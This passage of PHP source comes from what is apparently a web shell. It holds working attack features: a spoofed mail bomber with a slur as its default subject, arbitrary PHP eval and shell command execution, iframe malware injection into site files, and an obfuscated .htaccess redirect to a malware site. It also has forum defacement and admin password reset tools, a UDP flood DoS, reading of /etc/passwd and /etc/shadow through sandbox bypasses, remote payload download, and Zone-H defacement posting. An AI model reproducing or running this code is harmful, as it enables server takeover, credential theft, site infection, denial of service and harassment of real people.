2280 {
2281 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2282 {
2283 $times = $_POST['times'];
2284 while($times--)
2285 {
2286 if(isset($_POST['padding']))
2287 {
2288 $fromPadd = rand(0,9999);
2289 $subjectPadd = " -- ID : ".rand(0,9999999);
2290 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2291
2292 }
2293 $from = "president$fromPadd@whitehouse.gov";
2294 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2295 {
2296 $error = 1;
2297 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2298 break;
2299 }
2300 }
2301 if($error != 1)
2302 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2303 }
2304 }
2305 else if($_POST['mailfunction'] == "massmailing")
2306 {
2307 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2308 {
2309 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2310 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2311 else
2312 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2313 }
2314 }
2315}
2316else if(isset($_POST['code']))
2317{
2318 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2319 {
2320 // FIlter Some Chars we dont need
2321 ?><br>
2322 <textarea name="code" class="box" cols="120" rows="10"><?php
2323 $code = str_replace("<?php","",$_POST['code']);
2324 $code = str_replace("<?","",$code);
2325 $code = str_replace("?>","",$code);
2326
2327 // Evaluate PHP CoDE!
2328 htmlspecialchars(eval($code));
2329 ?>
2330 </textarea><?php
2331 }
2332 else if($_POST['code'] != null && $_POST['intext'] == "false")
2333 {
2334 $code = str_replace("<?php","",$_POST['code']);
2335 $code = str_replace("<?","",$code);
2336 $code = str_replace("?>","",$code);
2337
2338 // Evaluate PHP CoDE!
2339 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2340 }
2341}
2342else if(isset($_GET['infect']))
2343{
2344 $coun = 0;
2345 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2346 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2347 {
2348 if($injectj00 == __FILE__)
2349 continue;
2350 if($myfile=fopen($injectj00,'a'))
2351 {
2352 fputs($myfile, $str);
2353 fclose($myfile);
2354 $coun = 1;
2355 }
2356 }
2357 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2358 {
2359 if($myfile=fopen($injectj00,'a'))
2360 {
2361 fputs($myfile, $str);
2362 fclose($myfile);
2363 $coun = 1;
2364 }
2365 }
2366 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2367 {
2368 if($myfile=fopen($injectj00,'a'))
2369 {
2370 fputs($myfile, $str);
2371 fclose($myfile);
2372 $coun = 1;
2373 }
2374 }
2375
2376
2377 if($coun == 1)
2378 echo "<center>Done !!!!<center>";
2379 else
2380 echo "<center>Cannot open files !!!!<center>";
2381}
2382else if(isset($_GET['redirect']))
2383{
2384 if($myfile = fopen(".htaccess",'a'))
2385 {
2386 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2387 fwrite($myfile, gzuncompress(base64_decode($mal)));
2388 fwrite($myfile, "\n\r");
2389 fclose($myfile);
2390 echo "<center>Done !!!!<center>";
2391 }
2392 else
2393 echo "<center>Cannot open file !!!!<center>";
2394}
2395else if(isset($_GET['malware']))
2396{ ?>
2397 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2398 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2399 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2400 <div id="showmal"></div>
2401 <?php
2402}
2403else if(isset($_GET['codeinsert']))
2404{
2405 if($file1 = fopen(".htaccess",'r'))
2406 {
2407 ?><div id="showcode"></div>
2408 <form method=post>
2409 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2410 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2411 </form>
2412 <?php }
2413 else
2414 echo "<center>Cannot Open File!!</center>";
2415}
2416else if(isset($_POST['getcode']))
2417{
2418 if($myfile = fopen(".htaccess",'a'))
2419 {
2420 fwrite($myfile, $_POST['getcode']);
2421 fwrite($myfile, "\n\r");
2422 fclose($myfile);
2423 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2424 }
2425 else
2426 echo "Permission Denied";
2427}
2428else if(isset($_GET['uploadurl']))
2429{
2430 $functiontype = trim($_GET['functiontype']);
2431 $wurl = trim($_GET['wurl']);
2432 $path = magicboom($_GET['path']);
2433
2434 function remotedownload($cmd,$url)
2435 {
2436 $namafile = basename($url);
2437 switch($cmd)
2438 {
2439 case 'wwget':
2440 execmd(which('wget')." ".$url." -O ".$namafile);
2441 break;
2442 case 'wlynx':
2443 execmd(which('lynx')." -source ".$url." > ".$namafile);
2444 break;
2445 case 'wfread' :
2446 execmd($wurl,$namafile);
2447 break;
2448 case 'wfetch' :
2449 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2450 break;
2451 case 'wlinks' :
2452 execmd(which('links')." -source ".$url." > ".$namafile);
2453 break;
2454 case 'wget' :
2455 execmd(which('GET')." ".$url." > ".$namafile);
2456 break;
2457 case 'wcurl' :
2458 execmd(which('curl')." ".$url." -o ".$namafile);
2459 break;
2460 default:
2461 break;
2462 }
2463 return $namafile;
2464 }
2465 $namafile = remotedownload($functiontype,$wurl);
2466 $fullpath = $path . $directorysperator . $namafile;
2467 if(is_file($fullpath))
2468 {
2469 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2470 }
2471 else
2472 echo "<center>Failed to upload $namafile</center>";
2473}
2474else if(isset($_GET['createfolder']))
2475{
2476 if(!mkdir($_GET['createfolder']))
2477 echo "Failed To create";
2478 else
2479 echo "<font class=txt>Folder Created Successfully</font>";
2480}
2481else if(isset($_GET['selfkill']))
2482{
2483 if(unlink(__FILE__))
2484 echo "<br><center><font size=5>Good Bye......</font></center>";
2485 else
2486 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2487}
2488else if(isset($_GET['Create']))
2489{
2490 ?>
2491 <form method="post">
2492 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2493 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2494 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2495 </form>
2496
2497<?php }
2498else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2499{
2500 $content = $_POST['filecontent'];
2501 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2502 {
2503 fwrite($file_pointer, $content);
2504 fclose($file_pointer);
2505 echo "<font class=txt>File Created Successfully</font>";
2506 }
2507 else
2508 echo "Cannot Create File";
2509}
2510else if(isset($_REQUEST["defaceforum"]))
2511{
2512 ?>
2513 <center><div id="showdeface"></div>
2514 <font color="#FF0000" size="4">Forum Index Changer</font>
2515 <form action="<?php echo $self; ?>" method = "POST">
2516 <input type="hidden" name="forum">
2517 <input type="hidden" name="defaceforum">
2518 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2519 <tr>
2520 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2521
2522 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2523 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2524 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2525
2526 <tr><td height="50" width="50%">Type :
2527 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2528 <option value="vb">vbulletin</option>
2529 <option value="mybb">Mybb</option>
2530 <option value="smf">SMF</option>
2531 <option value="ipb">IPB</option>
2532 <option value="wp">Wordpress</option>
2533 <option value="joomla">Joomla</option>
2534 </select></td>
2535 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2536
2537 </tr>
2538 <tr>
2539 <td height="167" width="50%" colspan=2>
2540 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2541
2542 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2543 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2544 </div>
2545
2546 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2547 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2548 </td>
2549 </tr>
2550 </table>
2551 </form>
2552 </center>
2553 <?php
2554 }
2555 else if(isset($_GET["passwordchange"]))
2556 {
2557 echo "<center>";
2558 ?>
2559 <div id="showchangepass"></div>
2560 <font color="#FF0000" size="4">Forum Password Changer</font>
2561 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2562 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2563 <tr>
2564 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2565 <tr>
2566 <td height="50" width="50%">Type :
2567 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2568 <option value="vb">vbulletin</option>
2569 <option value="mybb">Mybb</option>
2570 <option value="smf">SMF</option>
2571 <option value="ipb">IPB</option>
2572 <option value="phpbb">PHPBB</option>
2573 <option value="wp">Wordpress</option>
2574 <option value="joomla">Joomla</option>
2575 </select></td>
2576 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2577 </tr>
2578 <tr>
2579 <td colspan=2 height="100" width="780">
2580
2581 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2582
2583 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2584
2585 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2586
2587 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2588 </tr>
2589 </table>
2590 </form>
2591 </center>
2592 <?php
2593}
2594else if(isset($_GET['dosser']))
2595{
2596 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2597 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2598 {
2599 $IP=$_GET['ip'];
2600 $port=$_GET['port'];
2601 $executionTime = $_GET['exTime'];
2602 $no0fBytes = $_GET['no0fBytes'];
2603 $data = "";
2604 $timeout = $_GET['timeout'];
2605 $packets = 0;
2606 $counter = $no0fBytes;
2607 $maxTime = time() + $executionTime;;
2608 while($counter--)
2609 {
2610 $data .= "X";
2611 }
2612 $data .= " Dhanush";
2613
2614 while(1)
2615 {
2616 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2617 if($socket)
2618 {
2619 fwrite($socket , $data);
2620 fclose($socket);
2621 $packets++;
2622 }
2623 if(time() >= $maxTime)
2624 {
2625 break;
2626 }
2627 }
2628 echo "Dos Completed!<br>";
2629 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2630 echo "Total Number of Packets Sent : " . $packets . "<br />";
2631 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2632 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2633 }
2634}
2635else if(isset($_GET['fuzzer']))
2636{
2637 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2638 {
2639 $IP=$_GET['ip'];
2640 $port=$_GET['port'];
2641 $times = $_GET['exTime'];
2642 $timeout = $_GET['timeout'];
2643 $send = 0;
2644 $ending = "";
2645 $multiplier = $_GET['multiplier'];
2646 $data = "";
2647 $mode="tcp";
2648 $data .= "GET /";
2649 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2650 if($_GET['type'] == "tcp")
2651 {
2652 $mode = "tcp";
2653 }
2654
2655 while($multiplier--)
2656 {
2657 $data .= urlencode($_GET['no0fBytes']);
2658 }
2659 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2660 $data .= "by-Dhanush".$ending;
2661 $length = strlen($data);
2662
2663
2664 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2665
2666 for($i=0;$i<$times;$i++)
2667 {
2668 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2669 if($socket)
2670 {
2671 fwrite($socket , $data , $length );
2672 fclose($socket);
2673 }
2674 }
2675 echo "Fuzzing Completed!<br>";
2676 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2677 echo "Total Number of Packets Sent : " . $times . "<br />";
2678 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2679 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2680 }
2681}
2682else if(isset($_GET['bypassit']))
2683{
2684 if(isset($_GET['copy']))
2685 {
2686 if(@copy($_GET['copy'],"test1.php"))
2687 {
2688 $fh=fopen("test1.php",'r');
2689 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2690 @fclose($fh);
2691 unlink("test1.php");
2692 }
2693 }
2694 else if(isset($_GET['imap']))
2695 {
2696 $string = $_GET['imap'];
2697 echo "<textarea cols=120 rows=20 class=box readonly>";
2698 $stream = imap_open($string, "", "");
2699 $str = imap_body($stream, 1);
2700 echo "</textarea>";
2701 }
2702 else if(isset($_GET['sql']))
2703 {
2704 echo "<textarea cols=120 rows=20 class=box readonly>";
2705 $file=$_GET['sql'];
2706
2707 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2708 $mysql_files = explode(':', $mysql_files_str);
2709
2710 $sql = array (
2711 "USE $mdb",
2712 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2713 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2714 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2715 . "ESCAPED BY '' "
2716 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2717
2718 "SELECT a FROM $tbl LIMIT 1"
2719 );
2720 mysql_connect ($mhost, $muser, $mpass);
2721
2722 foreach ($sql as $statement) {
2723 $q = mysql_query ($statement);
2724
2725 if ($q == false) die (
2726 "FAILED: " . $statement . "\n" .
2727 "REASON: " . mysql_error () . "\n"
2728 );
2729
2730 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2731
2732 echo htmlspecialchars($r[0]);
2733 mysql_free_result ($q);
2734 }
2735 echo "</textarea>";
2736 }
2737 else if(isset($_GET['curl']))
2738 {
2739 $ch=curl_init("file://" . $_GET[curl]);
2740 curl_setopt($ch,CURLOPT_HEADERS,0);
2741 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2742 $file_out=curl_exec($ch);
2743 curl_close($ch);
2744 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2745 }
2746 else if(isset($_GET['include']))
2747 {
2748 if(file_exists($_GET['include']))
2749 {
2750 echo "<textarea cols=120 rows=20 class=box readonly>";
2751 @include($_GET['include']);
2752 echo "</textarea>";
2753 }
2754 else
2755 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2756 }
2757 else if(isset($_GET['id']))
2758 {
2759 echo "<textarea cols=120 rows=20 class=box readonly>";
2760 for($uid=0;$uid<60000;$uid++)
2761 { //cat /etc/passwd
2762 $ara = posix_getpwuid($uid);
2763 if (!empty($ara))
2764 {
2765 while (list ($key, $val) = each($ara))
2766 {
2767 print "$val:";
2768 }
2769 print "\n";
2770 }
2771 }
2772 echo "</textarea>";
2773 break;
2774 }
2775 else if(isset($_GET['tempnam']))
2776 {
2777 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2778 $fp = fopen ( $mytmp, 'r' );
2779 while(!feof($fp))
2780 echo fgets($fp);
2781 fclose ( $fp );
2782 }
2783 else if(isset($_GET['symlnk']))
2784 {
2785 echo "<textarea cols=120 rows=20 class=box readonly>";
2786 @mkdir("mydhanush",0777);
2787 @chdir("mydhanush");
2788 execmd("ln -s /etc/passwd");
2789
2790 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2791 echo "</textarea>";
2792 }
2793 if(isset($_GET['newtype']))
2794 {
2795 $filename = $_GET['newtype'];
2796 echo "<textarea cols=120 rows=20 class=box readonly>";
2797 if($_GET['optiontype'] == "xxd")
2798 echo execmd("xxd ".$filename);
2799 else if($_GET['optiontype'] == "rev")
2800 echo execmd("rev ".$filename);
2801 if($_GET['optiontype'] == "tac")
2802 echo execmd("tac ".$filename);
2803 if($_GET['optiontype'] == "more")
2804 echo execmd("more ".$filename);
2805 if($_GET['optiontype'] == "less")
2806 echo execmd("less ".$filename);
2807 echo "</textarea>";
2808 }
2809}
2810// Deface Website
2811else if(isset($_GET['deface']))
2812{
2813 $myfile = fopen($_GET['deface'],'w');
2814 if(fwrite($myfile, base64_decode($ind)))
2815 {fclose($myfile);
2816 echo "Index Defaced Successfully";}
2817 else
2818 echo "Donot have write permission";
2819}
2820else if(isset($_GET['perms']))
2821{
2822?>
2823 <form>
2824 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2825 <table align="center" border="1" style="width:40%;border-color:#333333;">
2826 <tr>
2827 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2828 </tr>
2829 <tr>
2830 <td colspan="2" align="center" style="height:60px">
2831 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2832 </tr>
2833 </table>
2834
2835 </form>
2836 <?php
2837}
2838else if(isset($_GET["chmode"]))
2839{
2840 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2841 {
2842 $perms = 0;
2843 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2844 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2845 if(@chmod($_GET['myfilename'],$perms))
2846 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2847 else
2848 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2849 }
2850}
2851else if(isset($_GET['rename']))
2852{
2853?>
2854 <form>
2855 <table border="0" cellpadding="3" cellspacing="3">
2856 <tr>
2857 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2858 </tr>
2859 <tr>
2860 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2861 </tr>
2862 <tr>
2863 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2864 </tr>
2865 </table>
2866 </form>
2867 <?php
2868
2869}
2870else if(isset($_GET['renamemyfile']))
2871{
2872 if(isset($_GET['to']) && isset($_GET['file']))
2873 {
2874 if(!rename($_GET['file'], $_GET['to']))
2875 echo "Cannot Rename File";
2876 else
2877 echo "<font class=txt>File Renamed Successfully</font>";
2878
2879 }
2880}
2881else if(isset($_GET['open']))
2882{
2883 if(is_file($_GET['myfilepath']))
2884 {
2885 $owner = "0/0";
2886 if($os == "Linux")
2887 $owner = getOGid($_GET['myfilepath']);
2888 ?>
2889 <form>
2890 <table style="width:57%;">
2891 <tr align="left">
2892 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2893 </tr>
2894 <tr>
2895 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2896 </tr>
2897 </table>
2898 <textarea name="content" rows="15" cols="100" class="box"><?php
2899 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2900 if($content)
2901 {
2902 echo $content;
2903 }
2904 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2905 {
2906 if(filesize($_GET['myfilepath']) != 0 )
2907 {
2908 fopen($_GET['myfilepath']);
2909 while(!feof())
2910 {
2911 echo htmlspecialchars(fgets($_GET['myfilepath']));
2912 }
2913 }
2914 }
2915
2916 ?>
2917 </textarea><br />
2918 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2919 </form>
2920 <?php
2921 }
2922 else
2923 echo "File does not exist !!!!";
2924}
2925else if(isset($_POST['file']) && isset($_POST['content']))
2926{
2927 if(file_exists($_POST['file']))
2928 {
2929 $handle = fopen($_POST['file'],"w");
2930 if(fwrite($handle,$_POST['content']))
2931 echo "<font class=txt>File Saved Successfully!</font>";
2932 else
2933 echo "Cannot Write into File";
2934 }
2935 else
2936 {
2937 echo "File Name Specified does not exists!";
2938 }
2939}
2940else if(isset($_POST["SendNowToZoneH"]))
2941{
2942 $hacker = $_POST['defacer'];
2943 $method = $_POST['hackmode'];
2944 $neden = $_POST['reason'];
2945 $site = $_POST['domain'];
2946
2947 if (empty($hacker))
2948 {
2949 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2950 }
2951 elseif($method == "--------SELECT--------")
2952 {
2953 die("<center><font size=3>[-] You Must Select The Method !</center>");
2954 }
2955 elseif($neden == "--------SELECT--------")
2956 {
2957 die("<center><font size=3>[-] You Must Select The Reason</center>");
2958 }
2959 elseif(empty($site))
2960 {
2961 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2962 }
2963 // Zone-h Poster
2964 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2965 {
2966 $k = curl_init();
2967 curl_setopt($k, CURLOPT_URL, $url);
2968 curl_setopt($k,CURLOPT_POST,true);
2969 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2970 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2971 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2972 $kubra = curl_exec($k);
2973 curl_close($k);
2974 return $kubra;
2975 }
2976
2977 $i = 0;
2978 $sites = explode("\n", $site);
2979 echo "<pre class=ml1 style='margin-top:5px'>";
2980 while($i < count($sites))
2981 {
2982 if(substr($sites[$i], 0, 4) != "http")
2983 {
2984 $sites[$i] = "http://".$sites[$i];
2985 }
2986 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2987 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2988 ++$i;
2989 }
2990
2991 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2992}
2993else if(isset($_GET['executemycmd']))
2994{
2995 $comm = $_GET['executemycmd'];
2996 chdir($_GET['executepath']);
2997 echo shell_exec($comm);
2998}
2999// View Passwd file
3000else if(isset($_GET['passwd']))
3001{
3002 $test='';
3003 $tempp= tempnam($test, "cx");
3004 $get = "/etc/passwd";
3005 $name=@posix_getpwuid(@fileowner($get));
3006 $group=@posix_getgrgid(@filegroup($get));
3007 $owner = $name['name']. " / ". $group['name'];
3008 ?>
3009 <table style="width:57%;">
3010 <tr>
3011 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3012 </tr>
3013 <tr>
3014 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3015 </tr>
3016 </table>
3017 <?php
3018 if(copy("compress.zlib://".$get, $tempp))
3019 {
3020 $fopenzo = fopen($tempp, "r");
3021 $freadz = fread($fopenzo, filesize($tempp));
3022 fclose($fopenzo);
3023 $source = htmlspecialchars($freadz);
3024 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3025 unlink($tempp);
3026 }
3027 else
3028 {
3029 ?>
3030 <form>
3031 <input type="hidden" name="etcpasswd">
3032 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3033 <tr>
3034 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3035 </tr>
3036 <tr>
3037 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3038 </tr>
3039 <tr>
3040 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3041 </tr>
3042 </table><br>
3043 </form>
3044 <?php
3045 }
3046}
3047else if(isset($_GET['shadow']))
3048{
3049 $test='';
3050 $tempp= tempnam($test, "cx");
3051 $get = "/etc/shadow";
3052 if(copy("compress.zlib://".$get, $tempp))
3053 {
3054 $fopenzo = fopen($tempp, "r");
3055 $freadz = fread($fopenzo, filesize($tempp));
3056 fclose($fopenzo);
3057 $source = htmlspecialchars($freadz);
3058 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3059 unlink($tempp);
3060 }
3061}
3062else if(isset($_GET['bomb']))
3063{
3064 ?><div id="showmail"></div>
3065 <form>
3066 <table id="margins" style="width:100%;">
3067 <tr>
3068 <td style="width:30%;">To</td>
3069 <td>
3070 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3071 </td>
3072 </tr>
3073 <tr>
3074 <td style="width:30%;">Subject</td>
3075 <td>
3076 <input type="text" class="box" name="subject" value="Jew Here!" onFocus="if(this.value == 'Jew Here!')this.value = '';" onBlur="if(this.value=='')this.value='Jew Here!';" />
3077 </td>
3078 </tr>
3079 <tr>
3080 <td style="width:30%;">No. of Times</td>
3081 <td>
3082 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3083 </td>
3084 </tr>
3085 <tr>
3086 <td style="width:30%;">Pad your message (Less spam detection)</td>
3087 <td><input type="checkbox" name="padding"/></td>
3088 </tr>
3089 <tr>
3090 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3091 </tr>
3092 <tr>
3093 <td rowspan="2">
3094 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3095 </td>
3096 </tr>
3097 </table>
3098 </form>
3099 <?php
3100}
3101
3102//Mass Mailer
3103else if(isset($_GET['mail']))
3104{
3105 ?><div id="showmail"></div>
3106 <div align="left">
3107 <form>
3108 <table align="left" style="width:100%;">
3109 <tr>
